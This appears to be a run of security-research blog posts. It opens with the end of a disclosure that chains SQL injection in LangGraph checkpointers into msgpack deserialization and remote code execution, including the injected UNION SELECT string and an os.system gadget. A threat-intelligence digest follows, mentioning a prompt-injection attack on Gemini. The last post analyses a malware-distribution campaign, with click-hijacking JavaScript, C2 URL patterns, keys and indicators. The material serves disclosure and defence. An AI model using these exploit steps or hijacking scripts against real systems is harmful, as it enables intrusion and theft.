When calling the list() function on sqliteSaver (the checkpointer), the filter parameter is used to query checkpoints based on their metadata:

def list(
    self,
    config: RunnableConfig | None,
    *,
    filter: dict[str, Any] | None = None,  # Used to filter by metadata
    before: RunnableConfig | None = None,
    limit: int | None = None,
) -> Iterator[CheckpointTuple]:

The filter parameter is passed to an internal function called _metadata_predicate, which constructs the SQL WHERE clause to query checkpoints by their metadata fields.

# process metadata query
    for query_key, query_value in filter.items():
        operator, param_value = _where_value(query_value)
        predicates.append(
            f"json_extract(CAST(metadata AS TEXT), '$.{query_key}') {operator}"
        )
        param_values.append(param_value)

    return (predicates, param_values)

The Injection

The vulnerability exists in how _metadata_predicate handles the query_key from the filter dictionary.
Notice this critical line:

f"json_extract(CAST(metadata AS TEXT), '$.{query_key}') {operator}"

An attacker-controlled filter could provide a query_key with a ' character that will escape the JSON path string and inject arbitrary SQL code.

Injection -> Arbitrary Deserialization

To understand how SQL injection leads to arbitrary deserialization, we need to see the complete picture.
Here’s the SQL query that gets executed in list():

query = f"""SELECT thread_id, checkpoint_ns, checkpoint_id, parent_checkpoint_id, type, checkpoint, metadata
FROM checkpoints
{where}
ORDER BY checkpoint_id DESC"""

This query retrieves checkpoint data from the database, including the checkpoint’s BLOB column.
The results are then processed:

async for (
    thread_id,
    checkpoint_ns,
    checkpoint_id,
    parent_checkpoint_id,
    type,
    checkpoint,  # ← This comes directly from the SQL query results
    metadata,
) in cur:  # ← cur contains the query results
    # ... 
    yield CheckpointTuple(
        # ...
        self.serde.loads_typed((type, checkpoint)),  # ← Deserialization
        # ...
    )

The checkpoint contains serialized data, and when fetched gets deserialized.

The Attack

Using SQL injection in the WHERE clause, an attacker can inject a UNION SELECT that adds their own row to the query results:

SELECT thread_id, checkpoint_ns, checkpoint_id, parent_checkpoint_id, type, checkpoint, metadata
FROM checkpoints
WHERE ... (injected: ') UNION SELECT 'thread1', 'ns', 'checkpoint1', NULL, 'msgpack', X'', '{}' -- )
ORDER BY checkpoint_id DESC

The injected UNION SELECT returns a fake checkpoint row where the checkpoint column contains attacker-controlled serialized data. When the code loops through the query results, it deserializes this malicious checkpoint’s BLOB, giving the attacker arbitrary deserialization

Vulnerability #2: MsgPack Unsafe Deserialization (CVE-2026-28277)

Now let’s examine what happens during deserialization. The self.serde.loads_typed() function that deserializes checkpoint data looks like this:

def loads_typed(self, data: tuple[str, bytes]) -> Any:
    type_, data_ = data
    if type_ == "null":
        return None
    elif type_ == "bytes":
        return data_
    elif type_ == "bytearray":
        return bytearray(data_)
    elif type_ == "json":
        return json.loads(data_, object_hook=self._reviver)
    elif type_ == "msgpack":
        return ormsgpack.unpackb(
            data_, ext_hook=self._unpack_ext_hook, option=ormsgpack.OPT_NON_STR_KEYS
        )
    elif self.pickle_fallback and type_ == "pickle":
        return pickle.loads(data_)
    else:
        raise NotImplementedError(f"Unknown serialization type: {type_}")

Formats

  1. Pickle –  is disabled by default
  2. JSON –  The json.loads() with object_hook was discussed in our LangGrinch research, but does not lead to code execution
  3. Msgpack – This is the one we are interested in

What is msgpack?

MessagePack (msgpack) is a binary serialization format designed to be faster and more compact than JSON. LangGraph uses ormsgpack, a Rust-based implementation with Python bindings.

Msgpack Extensions

MessagePack allows developers to define custom extension types to handle additional data types beyond its built-in primitives. LangGraph implemented its own extension handler to support serialization of custom Python objects.

When the type_ is msgpack, the code calls:

ormsgpack.unpackb(data_, ext_hook=self._unpack_ext_hook, option=ormsgpack.OPT_NON_STR_KEYS)
```
The `ext_hook` parameter points to LangGraph's custom implementation: `_msgpack_ext_hook`.

```python
def _msgpack_ext_hook(code: int, data: bytes) -> Any:
    if code == EXT_CONSTRUCTOR_SINGLE_ARG:
        try:
            tup = ormsgpack.unpackb(
                data, ext_hook=_msgpack_ext_hook, option=ormsgpack.OPT_NON_STR_KEYS
            )
            # module, name, arg
            return getattr(importlib.import_module(tup[0]), tup[1])(tup[2])
        except Exception:
            return

When an attacker controls the serialized data, they control both the extension code and the data bytes.

The vulnerability

If we pass a msgpack with EXT_CONSTRUCTOR_SINGLE_ARG code, and the tuple:

  1. os
  2. system
  3. Command (“echo PWN > /tmp/pwned.txt” for example)

When this line executes:

return getattr(importlib.import_module(tup[0]), tup[1])(tup[2])

It will:

1. Import the os module

2. Get the system function from it

3. Call os.system("echo PWN > /tmp/pwned.txt")

This gives an attacker arbitrary code execution – by calling os.system() with attacker-controlled commands, they can execute any shell command on the server.

The Attack Chain: Combining Both Vulnerabilities

Now let’s walk through how an attacker chains these two vulnerabilities together to achieve remote code execution.

The Entry Point: When a developer exposes get_state_history(), it internally calls the checkpointer’s list() method to retrieve historical checkpoints:

def get_state_history(
    self,
    config: RunnableConfig,
    *,
    filter: Optional[Dict[str, Any]] = None,
    before: Optional[RunnableConfig] = None,
    limit: Optional[int] = None,
) -> Iterator[StateSnapshot]:
    # ...
    for checkpoint_tuple in self.checkpointer.list(config, filter=filter, before=before, limit=limit):
        # Process and return checkpoint data

If the filter parameter comes from user input without sanitization, an attacker controls the dictionary keys passed to the SQL injection vulnerability.

The Attack Flow

1. Craft Malicious Payload: The attacker prepares a msgpack payload containing instructions to execute arbitrary code (e.g., run a shell command).

2. Exploit SQL Injection: The attacker sends a malicious filter parameter that exploits the SQL injection vulnerability. This injection adds a fake checkpoint row to the database query results, where the checkpoint column contains their malicious msgpack payload.

3. Trigger Deserialization: When the application processes the query results, it encounters the injected fake checkpoint and deserializes the malicious msgpack data.

4. Code Execution: The unsafe deserialization executes the attacker’s payload, giving them remote code execution on the server.

Vulnerability #3: SQL Injection in the Redis Checkpointer (CVE-2026-27022)

The same injection class affects langgraph-checkpoint-redis: user-controlled keys in the filter dictionary are interpolated directly into the query instead of bound as parameters. Preconditions match CVE-2025-67644 (the application exposes get_state_history() with a user-controlled filter and uses the Redis checkpointer). Patched in langgraph-checkpoint-redis 1.0.2.

Additional SQL Injection Findings

Beyond the primary SQL injection in the filter parameter, we identified additional defense-in-depth SQL injection issues in both the SQLite and PostgreSQL checkpointers. These involved direct concatenation of integer values (such as LIMIT and ttl parameters) into SQL queries instead of using parameterized bindings.

Since Python doesn’t enforce type hints at runtime, these parameters could still accept malicious string input. We worked with the LangChain team during disclosure to remediate these issues using parameterized queries.

Disclosure Timeline

2025-11-19: CVE-2025-67644 (SQL injection), CVE-2026-28227 (msgpack deserialization) And CVE-2026-27022 (Redis injection) disclosed to LangChain team

2025-12-10: CVE-2025-67644 fixed and publicly released in langgraph-checkpoint-sqlite 3.0.1

2026-02-20: CVE-2026-27022  fixed and publicly released in langgraph-checkpoint-redis 1.0.2

2026-03-05: CVE-2026-28277  fixed and publicly released in langgraph-checkpoint 4.0.1

Note on Vendor Response

The LangChain team responded quickly to fix the critical SQL injection vulnerability, which effectively breaks the attack chain described in this research. They continue to work methodically on additional remediation efforts, including the msgpack deserialization issue.

Additional Research

There was significant community research into LangGraph security during November and December 2025. Other security researchers independently discovered CVE-2025-67644 and CVE-2026-28277. Full credits can be found in LangChain’s security advisories.

The post From SQLi to RCE – Exploiting LangGraph’s Checkpointer appeared first on Check Point Research.

Received — 8 June 2026 Check Point Research

8th June – Threat Intelligence Report

By: urias
8 June 2026 at 16:47

For the latest discoveries in cyber research for the week of 8th June, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • DentaQuest, a U.S. dental benefits administrator owned by Sun Life, has suffered a data breach after threat group ShinyHunters leaked exfiltrated data. Analysts assessed that 2.6 million accounts were exposed, including names, emails, government IDs, and health insurance details.
  • Password manager Dashlane has disclosed an attack in which threat actors brute-forced two-factor codes to register unauthorized devices and download encrypted password vaults for less than 20 users. The campaign began May 31 and was contained after lockouts.
  • The United Nations World Food Programme has disclosed unauthorized access to its Gaza self-registration application, exposing names, identification numbers, mobile numbers, and location data. The breach affected about 600,000 Palestinian households across Gaza, and WFP suspended the platform while responding to the incident.
  • Russia’s Federal Security Service claims that foreign intelligence agencies hacked mobile devices belonging to senior Russian officials. The alleged spyware operation enabled access to correspondence, calls, geolocation data, contact lists, and covert audio and video surveillance.
  • Hola, whose Windows browser serves millions of users, has confirmed a supply chain compromise that pushed an unauthorized executable to some users. The file operated as a cryptominer, installed as a Windows service, and excluded itself from Defender. An independent review found impact limited to about 0.1% of users.

AI THREATS

  • Check Point highlighted an AI security risk after reports that attackers used Meta’s AI support chatbot to seize Instagram accounts. Granting AI agents account recovery authority to change emails or approve requests without identity checks can enable unauthorized access, showing that permissions and verification shape the risk.
  • Researchers demonstrated a notification-based prompt injection technique called Fake Context Alignment that manipulated Google’s Gemini voice assistant through incoming messages. The attack hid authorization prompts and enabled device control, auto-joining Zoom video calls, and cross-device memory poisoning. Google deployed classifier updates after disclosure.
  • Researchers described an AI-enabled EDR evasion lab where a threat actor automates malware development and testing against Sophos, CrowdStrike, and Microsoft Defender. LLM-driven agents and an automated Active Directory panel coordinate iterative trials, supporting stealthy post-exploitation tied to ransomware deployment and data theft.

VULNERABILITIES AND PATCHES

  • Google has released its June Android security patch for 124 vulnerabilities, including CVE-2025-48595, a high-severity Android Framework flaw under exploitation. Local attackers can use the vulnerability to gain code execution and escalate privileges on devices running Android 14 or later.
  • Cisco has released patches for CVE-2026-20230, a critical Unified Communications Manager and Session Management Edition flaw that allows unauthenticated network attackers to write files and escalate to root. A public proof-of-concept was already published. The bug requires WebDialer enabled, and fixes include 14SU6 and an interim 15.x COP.
  • SolarWinds Serv-U CVE-2026-28318 has been exploited in attacks against file transfer servers. The unauthenticated flaw lets crafted HTTP POST requests using a deflate header crash the service and disrupt operations. SolarWinds fixed the vulnerability in Serv-U 15.5.4 HF1.
  • CVE-2026-41089 in Microsoft Windows Netlogon is being exploited in attacks against Windows Server domain controllers. The critical stack-based buffer overflow flaw can allow remote code execution through crafted network requests. Successful exploitation may give attackers SYSTEM-level control of domain controllers in vulnerable Active Directory environments.

Check Point IPS provides protection against this threat (Microsoft Windows Netlogon Remote Code Execution (CVE-2026-41089))

THREAT INTELLIGENCE REPORTS

  • Check Point Research has investigated a large-scale impersonation and click-hijacking scheme that reroutes downloads from fake open-source sites through a gated traffic distribution system. Impersonating tools like Ghidra and dnSpy, it led to infection by RemusStealer, AnimateClipper, and a new loader called SessionGate.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat

  • Check Point Research linked a Dutch seizure of about 800 servers at hosting provider WorkTitans B.V. to Iranian cyber espionage operations. MuddyWater, Agrius, and Nimbus Manticore used this infrastructure for attacks that enabled remote access, credential theft, and scanning.
  • Check Point researchers have surveyed the 2026 U.S. midterm threat landscape, finding that operations focus on phishing, brand impersonation, and domain abuse rather than ballot tampering. Russian-linked Doppelganger networks cloned major media sites, vote-related domains increased, and exposed ActBlue and WinRed credentials surfaced.
  • Researchers identified a months-long espionage campaign that covertly siphoned a senior executive’s Microsoft Outlook mailbox at a major global stock exchange. Attackers used legitimate cloud storage services and disguised update tasks to persist and move data in small batches, enabling five months of undetected access.

The post 8th June – Threat Intelligence Report appeared first on Check Point Research.

Impersonation, Click Hijacking, and TDS: Inside a Malware Distribution Ecosystem

3 June 2026 at 15:21

Research by: Alexey Bukhteyev

Key Takeaways

  • Check Point Research investigated a large-scale operation that impersonates open-source and freeware projects to capture search traffic, including lookalikes for researcher and security tooling such as Ghidra, dnSpy, and SpiderFoot. The sites are well-designed and often look like legitimate project portals at a glance, sometimes referencing real upstream resources. The deception is not in the page content alone, it’s in what happens when a user interacts.
  • Our analysis shows these pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.
  • The observed ecosystem appears to be built primarily for traffic acquisition and monetization, likely leveraging legitimate ad-tech and monetization tooling, while downstream redirect chains repeatedly led selected users to malware delivery infrastructure.
  • The downstream branches we analyzed led to multiple malware families, including RemusStealer, AnimateClipper, and the SessionGate framework, which we observed delivering PUA (Potentially Unwanted Applications), suggesting this was not an isolated malicious redirect.

Introduction

When we search Google for a popular piece of software, we usually click the first result, sometimes without even looking at the rest, because official project sites tend to rank highest and appear near the top of the results.

After landing on a site with a professional design and links that appear to point to the project’s official GitHub repository, most users intuitively trust it and proceed to download and run the installer without a second thought. Nothing seems suspicious: the first link in Google, a polished “official-looking” website, and references to the real project. What could go wrong?

Check Point Research investigated a large-scale campaign in which malicious and unwanted software is distributed through a gated traffic-routing stack. The operation relies on professionally built open-source and freeware impersonation sites, where click events initiate routing through a Traffic Distribution System (TDS) — a traffic-filtering and redirection layer that can send different users to different destinations based on factors such as geography, device type, browser fingerprint, or campaign rules — and can ultimately lead to payload delivery.

What makes this campaign especially notable is the choice of brands: a high-risk subset of sites impersonates trusted reverse-engineering tools such as Ghidra and dnSpy, used by security researchers and malware analysts.

Figure 1 – Impersonated websites of popular software tools

The broader phenomenon of websites impersonating popular open-source and freeware projects had already been documented by late 2025. In November 2025, Fullstory reported a large cluster of such fraudulent domains and did not identify direct abuse in their examined samples at the time (including checking hosted archives against known-good content), while emphasizing the clear security risk and the potential for downstream phishing or watering-hole style abuse.

Our findings show that this ecosystem has evolved. We observed that by at least December 2025, the sites in this cluster had TDS scripts embedded into their workflow, and from early January 2026 onward, we recorded active malware distribution via the same infrastructure.

The scale is reflected in VirusTotal telemetry: more than 5,000 total submissions across relevant samples, indicating substantial reach in just the subset visible through public sharing. The real exposure is likely significantly higher.

Figure 2 – VirusTotal total submitters exceeding 5,000, indicating the scale of the operation.

Among the payloads distributed through this TDS infrastructure, we identified several malware families:

  • SessionGate — A previously unknown multi-stage loader with heavy obfuscation and extensive anti-analysis mechanisms, which makes obtaining the final payload extremely difficult. In the chains we observed, it was used to deliver potentially unwanted applications (PUA). We examine SessionGate more deeply later on this article.
  • RemusStealer — a newly emerged infostealer designed to steal data from more than 20 browsers and targeting hundreds of browser extensions and applications, including cryptocurrency wallets, two-factor authentication tools, and password managers.
  • AnimateClipper — A cryptocurrency clipper capable of hijacking transactions across more than 20 blockchain ecosystems.

Importantly, we do not assess these impersonation sites as being built exclusively for malware distribution. The more plausible primary objective is traffic acquisition and monetization. However, by embedding a gated TDS layer and funneling search traffic into it, the operators become part of a distribution chain whose downstream consumers can include malware distributors. The same traffic pipeline that drives gray monetization can also selectively route real users to malicious payloads.

Impersonation, click hijacking, and the post-click routing

Our investigation started with several domains impersonating official project pages and download portals for tools widely used by security researchers.

For relevant queries, some of these “project portals” appeared surprisingly high in search results:

Figure 3 – Fake Ghidra project website in Google search results

What these sites have in common is a shared staging component: their pages load CloudFront-hosted Traffic Distribution System scripts from Amazon CloudFront, a legitimate content delivery network (CDN) service widely used to distribute web content through globally distributed infrastructure. These scripts turn the first “Download” click into a post-click routing chain.

The scripts are fetched from URLs with a consistent pattern, for example:

  • https://d33f51dyacx7bd.cloudfront[.]net/?aydfd=1237183
  • https://dcbbwymp1bhlf.cloudfront[.]net/?wbbcd=1236609

In total, we identified more than 100 currently active websites embedding these scripts, reusing the same campaign-style identifiers and the same CloudFront domains.

Below are some of the entry domains from the cluster, with an emphasis on impersonated brands that are commonly trusted by technical users:

  • Security/researcher tooling look-alikes
    • ghidralite[.]com
    • dnspy[.]org
    • ilspy[.]org
  • Developer/utility tooling look-alikes
    • grpcurl[.]com
    • mqttexplorer[.]com
    • mfcmapi[.]com
    • winsetupfromusb[.]org
    • crystaldiskmark[.]org
    • guiformat[.]com

While we have identified multiple targets that seems to primarily target security researchers, we have not found any strong evidence suggesting we could be dealing with potential targeted attacks. As previously mentioned, ultimate goal seems primarily for traffic acquisition and monetization.

Download button click hijacking

The key trick used on these fake websites is that the “Download” button can look legitimate even to a careful user. The page keeps the original href intact, often pointing to a real upstream destination such as a GitHub release, which means browser UI cues like the status bar on hover still show a plausible target.

Figure 4 – Hovering over the download button reveals the legitimate GitHub repository URL.

At the same time, once the user interacts with the page, the previously loaded CloudFront-hosted JavaScript can intercept the first eligible user interaction and hand it off to a Traffic Distribution System (TDS). The script contains multiple browser-side serving methods — alternative strategies for opening or navigating a tab/window to the TDS-controlled destination.

The default serving method is supplied in the configuration, while the browser-side runtime can still adapt locally based on factors such as browser family, mobile vs. desktop environment, frequency-capping state, and adblock-related logic. In practice, these methods differ mainly in how they preserve a browser-accepted, user-initiated opening opportunity and deliver the final TDS URL. The runtime includes several approaches, including calling a cached reference to window.open, using different primary events in different browsers, opening intermediate or temporary blank tabs that are later navigated to the final URL, or using a synthetic click on a dynamically created <a target="_blank"> element whose javascript: URL assigns window.location.href to the TDS URL.

For example, on desktop Firefox the runtime uses a capture-phase click handler; on desktop Chrome, the corresponding primary event is mousedown. The handler records the user’s intended destination if the interaction occurs inside a link, generates a TDS runtime URL, invokes the selected serving method, and then takes over the original interaction by calling preventDefault() to cancel the normal navigation and stopImmediatePropagation() to prevent other handlers from processing the same event.

A simplified version of the common event-wrapper logic is shown below. The exact invoke() implementation depends on the selected serving method.

const cachedOpen = window.open;

document.addEventListener(isChromeDesktop() ? "mousedown" : "click", (event) => {
  const method = currentServingMethod();
  if (!isEligibleClick(event.target)) return;

  const runtimeUrl = generateRuntimeURL({
    referrer: location.href,
    userDestination: extractClickedLink(event.target)
  });

  method.invoke(cachedOpen, runtimeUrl, event);

  event.stopImmediatePropagation();
  event.preventDefault();
}, true);

The routing logic is also gated by browser-side state and frequency caps, including values stored in localStorage. This creates a reproducibility trap: the first eligible click may route through the TDS chain, while refreshes, repeated clicks, or return visits can fall back to the original visible link target. The script also forwards the clicked link destination downstream, allowing the routing layer to know what the user appeared to be trying to open.

In other words, a click on what appears to be a legitimate link or download button can be converted into a navigation to a completely different URL controlled by the TDS.

window.addEventListener(browser.isChrome() ? "mousedown" : "click", function () {
  w = window.open("about:blank", /* ... */);
});

document.addEventListener("click", function (e) {
  const el = e.target.closest("a, button");
  if (!el) return;

  e.preventDefault();
  e.stopImmediatePropagation();

  window.g(/* ... */, selectedPostClickUrl);
}, true);

window.g = function(/* ... */, u) {
  w.location.href = u;
};

Real redirect chains: gating and branching outcomes

After the click handoff, the workflow becomes visible as a sequence of redirects. We observed numerous redirect chain variations. In many cases, repeated attempts to enter the TDS chain from the same IP address resulted in downloads of benign software (for example, the Opera browser). Some chains ended with the delivery of unnecessary, yet non-malicious, browser extensions.

At the same time, other redirect paths ultimately led to the download of malware.

Figure 5 – Some of the observed redirect chains across the TDS infrastructure.

In all of our experiments, the browser was first redirected to a post-click redirector:

oundhertobeconsist[.]org/<token>

However, this domain is not hardcoded in the page or the scripts. It is supplied dynamically through the decoded stage configuration delivered from CloudFront, together with other campaign parameters.

A decoded configuration block observed in multiple cases contained:

{
  "tagId": 1230479,
  "redirectorDomain": "oundhertobeconsist.org",
  "pixelDomain": "ukentaspectsofc.org",
  "capPerDomain": 2,
  "capPerUri": 1,
  "intervalBetweenPops_ms": 60000,
  "resetInterval_sec": 43200,
  "extraCloudFront": "//d2f5h9m0jmnhjh.cloudfront.net",
  "namespace": "xcvmsbcmxa"
}

The redirector then forwarded the browser along one of several possible branches. Some of the observed variants include:

  • In one family of redirect chains, users were sent directly to an offer wall / content locker (unlockcontent.org), which may result in affiliate-tagged downloads of legitimate software or potentially unwanted applications (PUA).
  • In another family, users were redirected into a multi-gate chain (trkscope[.]xyz, file-enter-web[.]com) before reaching the final delivery infrastructure.

The multi-gate path introduces a second branching point after the anti-bot gate (file-enter-web[.]com). From there, sessions can be routed either to a download gate with direct archive delivery (media.stellarcloudhub1[.]cfd, arch2.maxdatahost1[.]cyou) or to a different gated path that bridges to external hosting platforms (observed ending at mega.nz).

The specific redirect path appears to be influenced by multiple factors, including the user’s country, browser type, VPN usage, client fingerprint, click context, and the original entry domain.

SessionGate: From “Benign Installer” to a Gated, Multi-Stage Framework

We have uncovered several malware families as the final payload, including RemusStealer and AnimateClipper, however, one that stood out was a previously unknown malware we named SessionGate.

SessionGate case drew our attention not only because of its multi-stage delivery chain and extensive validation logic, but also due to a rather unusual anti-analysis approach. Combined with the TDS-side gating, it makes obtaining the final payload extremely difficult for analysts.

VirusTotal telemetry indicates broad reach for this branch. Individual samples associated with SessionGate family were submitted thousands of times, with some reaching approximately 2,000 to 3,500 submissions. The observed submission and lookup activity was distributed globally, with especially notable visibility in Turkey, Poland, Brazil, Germany, France, Russia, and the United Kingdom.

Figure 6 – VirusTotal telemetry (submissions and lookups) for an SessionGate sample.

We believe the TDS chain includes a backend service that “registers” the victim’s IP address, after which the victim must traverse the entire redirect path end-to-end. The payload delivered at a later stage appears to be unique per client, generated server-side for each session, and intended for one-time execution. The embedded modules within that payload are encrypted, and the decryption key material is produced based on data provided by the C2 server only once for that specific sample. As a result, a complete decryption and analysis is only possible if the researcher’s environment does not raise suspicion at any stage, and the analyst manages to fully intercept and decrypt all relevant traffic.

In addition, each stage employs obfuscation techniques that effectively undermine static analysis tooling (disassemblers and decompilers) and can even hinder AI-based reverse-engineering agents.

The figure below schematically illustrates the delivery sequence, C2 communication, and the module decryption flow.

Figure 7 – PUA branch infection chain

We identified two landing pages that initiate the download of samples belonging to this family:

originaldownloads[.]info
getfluxfile[.]com

The landing pages look as follows:

Figure 8 – Two landing pages observed delivering SessionGate samples.

Each landing page generates a short-lived, unique payload download URL per client session, bound to the client’s browser and IP address. Examples of generated URLs include:

https://s3.us-east-2.amazonaws[.]com/marketstagofortdas/ehjm145uvt/Download_Ready_461049.html?utm_source=partner_consent
https://s3.us-east-2.amazonaws[.]com/activeslatnascdngetrcv/wstq162fmo/SetupFile_839132.html?utm_source=partner_consent

The HTML page contains obfuscated JavaScript that performs a server-side validation step (performed by

https://javascriptapiusa[.]com/lic?) before allowing access to the payload. The payload is then downloaded using the same name but with .exe extension, for example:

https://s3.us-east-2.amazonaws[.]com/marketstagofortdas/ehjm145uvt/Download_Ready_461049.exe

As observed, different S3 buckets may be used. Below are some of those identified by us between January and March 2026:

["activeslatnascdngetrcv", "globalhasigasnaledsftwre", "marketstagofortdas", "activesltnascdngetrcv", "globalhsigasnaledsftwre", "dimarketorotacti", "softmakreplnt", "softmakreplntl", "activemktsolution", "dimarketorotactis", "signedmarkeotk", "marketstgofortdas"]

Downloader with a built-in decoy: embedded 7-Zip SFX content

The loader contains an embedded 7-Zip archive, and it can pivot to a benign installer experience when its gated delivery path does not proceed.

This decoy design matters operationally: analysts and automated sandboxes often observe a “normal installer” UI, while the malicious delivery chain remains gated.

One of the first red flags is that the downloaded archive is about 20 MB, yet it contains a file of only 15 MB. The remaining ~5 MB consists of heavily obfuscated loader code.

Figure 9 – The contents of the SFX archive.

Because of the obfuscation techniques in use, including injected junk code, opaque predicates, and string encryption, the resulting functions become extremely bloated. This alone significantly complicates analysis, as it can break parts of common tooling, including IDA’s decompiler and even graph mode. Some functions exceed 500 KB in size.

In addition, encrypted string blobs are placed directly inside function bodies after conditional branches (opaque predicates). This causes disassemblers to misinterpret the string data as executable code, which further disrupts analysis and can prevent tools from correctly identifying function boundaries in the first place.

Figure 10 – Bogus math, opaque predicates and encrypted strings in the analyzed samples

However, this obfuscation method is very characteristic and follows the same patterns, allowing for easy identification of other samples of this family.

The sample also runs multiple environment checks that influence whether it proceeds with malicious delivery or falls back to decoy behavior. The loader checks for the presence of certain services, but the service names are not stored plainly. Instead, it compares Adler-32 hashes against constants, effectively hiding the indicator list.

The identified service name indicators include:

  • eelam, ehdrv, eamonm, epfwwfp, epfw, ekbdflt, edevmon
  • npf, npcap, sysmondrv

In addition to services, the loader also enumerates running processes (Toolhelp-based scanning). Here too, the indicators are not kept as plaintext: they are compared via hash-based logic (SHA1 table approach), again reducing the value of simple string hunting.

Finally, the loader checks system context such as:

  • Windows Defender PUA/PUS-related registry settings (e.g., PUAProtection, MpEnablePus)
  • Windows “Enterprise” edition detection (by inspecting the ProductName string)

Taken together, these checks ensure that malicious activity is only launched on systems where it is most likely to go undetected.

Stage 1: The Loader’s C2 – Multi-Step “Check-in” With Gating

Once executed, the loader attempts to contact its C2 and perform several check-in steps before it tries to retrieve the next-stage payload.

In the campaigns we analyzed, one observed C2 domain was:

  • appfreshstart[.]com

We also observed related campaigns using domains such as:

  • appgetonline[.]com
  • webinnosetup[.]com
  • appmakingcenter[.]com

The loader’s C2 requests use a distinctive URL structure consisting of multiple path segments and a query suffix, and uses a specific User-Agent string NSIS_InetLoad (Mozilla). The pattern looks like:

https://<c2>/<tokenA>/<tickA>/<tokenB>/<tickB>?<sig16><timestamp>

The values in the <tokenX> fields are stored enrypted in the sample and are unique per campaign. They are also used to identify specific stages, for example:

  • check-in;
  • check-in after privilege elevation;
  • payload request.

When constructing the URL, the loader incorporates random tick-derived values, a timestamp, and a signature calculated as SHA1({base_path}/{timestamp}/{salt}), where salt is a shared secret known to both the sample and the server.

In the analyzed sample, salt = "118107B05C590076239FF759CD9E5".

Example request:

GET https://appfreshstart.com/06A3AEF73537C68C/00507206521/26203FA83EC99DDE/77035662512?FF584F0057B9F6F81770356625 HTTP/1.1
Host: appfreshstart.com
User-Agent: NSIS_InetLoad (Mozilla)
Accept: /

For check-in requests, the server responds with a hex string. The loader then sums all decimal digits in that string. If the resulting value is even, execution is aborted.

We observed this behavior when attempting to download the payload again from the same IP address, and also when the sample was obtained outside of the intended TDS chain.

Using a similar request structure, but with different tokenA and tokenB values, the loader requests the next-stage payload from the server. At this step, the server can also block delivery: in our experiments, we occasionally received an empty response. In some campaigns, the payload was additionally encrypted.

We observed multiple variants of the loader. In some cases, the downloaded payload was executed directly from memory, while in others it was written to disk. For disk-based execution, the loader creates a temporary directory and file under %TEMP%. The downloaded file is then launched with two command-line arguments, for example:

"<tmp_filename>.exe" 5568725089114413 DNQ5q9t4mVzASXrJMqVsA6/rjdVV12bOaI7kXqemD9uW/eqleH0aqGh/0glYQt1yrXQjkwN7Bm+PzpsNT/VljVIG7R0Kldo/aFDkzhed2jaSbLtANScmGWkY/wSKVVqUVxwlfJQT4D+S6GD4EnFjet8pp1lEWXl+Vg4QY/Wwz5I=

Stage 2: One more 7-Zip SFX archive with a decoy

The second-stage binary is another large Windows GUI executable (usually up to 10MB) that impersonates a legitimate 7-Zip SFX installer. Its string-encryption and code-obfuscation style is highly consistent with other samples in the same delivery framework.

Notably, it contains a PDB path: D:\\code\\cpp-downloader-scb-reg-other\\Plugins\\7ZipDownloader\\Output\\SFXWin.pdb. We used this artifact for pivoting and found 200+ similar samples on VirusTotal, with the earliest ones appearing in late August 2025.

On launch, the sample checks its command line: the first argument must look like a numeric token, and the second must look like a base64 string. The base64 blob is then further decrypted and validated by an embedded module (described later). If the checks fail, the sample falls back to the benign 7-Zip SFX behavior, showing a normal “installer/extractor” flow.

Figure 11 – Very low VT detection rate of the 2nd stage payload samples.

When the gate passes, the binary reads its own on-disk image, extracts two embedded DLL payloads, and decrypts them using AES-CBC. The modules are not written to disk: they are loaded via in-memory PE manual mapping (often referred to as reflective / manual-map loading), and execution is transferred through exported functions.

  • DLL #1 is decrypted first using a key derived locally:
    • key1 = SHA256("WDNkCQnmXc" || tail32) where tail32 is a 32-byte slice from the loader’s file image.
  • After mapping DLL #1, the loader resolves and calls an export named c1, passing the loader’s own SHA-256 hash (uppercase hex string) and an output buffer.
  • The output of c1, combined with a second hardcoded string constant, is used to derive the key for DLL #2:
    • key2 = HEX_UPPER(SHA256("webh5vnGVew" || c1_output))
  • The loader then decrypts and maps DLL #2 the same way and calls its exported entry point (observed as mainFunc), passing through the original command-line arguments.

However, we encountered major problems while decrypting DLL #2. The problem is that the output of function c1 is not static, but depends on the data returned by the C&C server.

DLL #1 – “Key Broker” module

After the stage-2 SFX loader decrypts and maps DLL #1 in memory, it resolves and calls an exported function named c1. From the loader’s point of view, DLL #1 acts as a key broker: it performs strict gating based on the process command line, contacts a dedicated “CRC” C2 endpoint, transforms the server response into a short token, and returns it to the loader. The loader then mixes this token with a hardcoded value to derive the AES key material for decrypting DLL #2.

Command-line gating

First, the module performs the same command line check as the parent executable: the first argument must look like a numeric token, and the second must look like a base64 string.

Then it decodes the base64 string from the second command line argument using AES-256-CBC with a fixed hardcoded key BFEA4EE8EF934BE7A2B4C64A0BAD1E92 (32 bytes; not hex-decoded) and a zero IV.

It skips the first 32 bytes and treats the remaining bytes as a UTF-16 string. In the samples we analyzed, this string holds a path-like marker such as:

C:\\Users\\user\\Desktop\\SetupFile_411815.exe

The decrypted value is then validated by checking the filename suffix pattern: the filename must contain an underscore followed by 3-10 lowercase alphanumeric characters, and end with an extension (e.g., _411815.exe). This check is important operationally: it prevents the module from functioning correctly when executed outside of the intended delivery flow. If any of these checks fail, the DLL exits early and returns no usable output, that leads to the loader’s “benign SFX fallback” flow.

In addition to command-line gating, DLL #1 runs lightweight anti-analysis checks. In particular, it checks the local environment against hardcoded blacklists derived from:

  • SHA-256 of the current username and computer name, and
  • MD5 hashes of ntdll.dll export names (a common way to detect non-standard runtime environments such as emulation layers or heavily instrumented sandboxes).

When any blacklist condition matches, the module aborts before contacting its key server.

Key request: C2 receives the loader’s hash, returns per-build token material

If the gate passes, DLL #1 contacts a dedicated “CRC” C2 domain (observed variants include):

  • yourfastcrc[.]com
  • mobileversioncrc[.]com
  • webcrcprove[.]com
  • integritycrc[.]com

The request follows a consistent pattern:

https://<crc-domain>/check_version?version=<hash>

The value passed in version= contains the uppercase SHA-256 hex hash of the stage-2 loader itself and is provided by the stage-2 loader when calling c1.

The C2 response is a short ASCII string, for example:

qWTL9kRfF3ndz5UGs3jPWsriG4yFfRnvZxffshBIunIBDFwVfgGbGFUjpTJaFwBB

DLL #1 uses the first 64 characters and performs a deterministic transformation to produce a 32-character base62 token, which it returns to the loader via the output buffer. For the example above, the resulting value is:

q2lOy0GwLqW1yRwIYAzH33CjBV9PoRrA

The loader then combines this c1 output with a hardcoded constant to derive the AES key material for DLL #2.

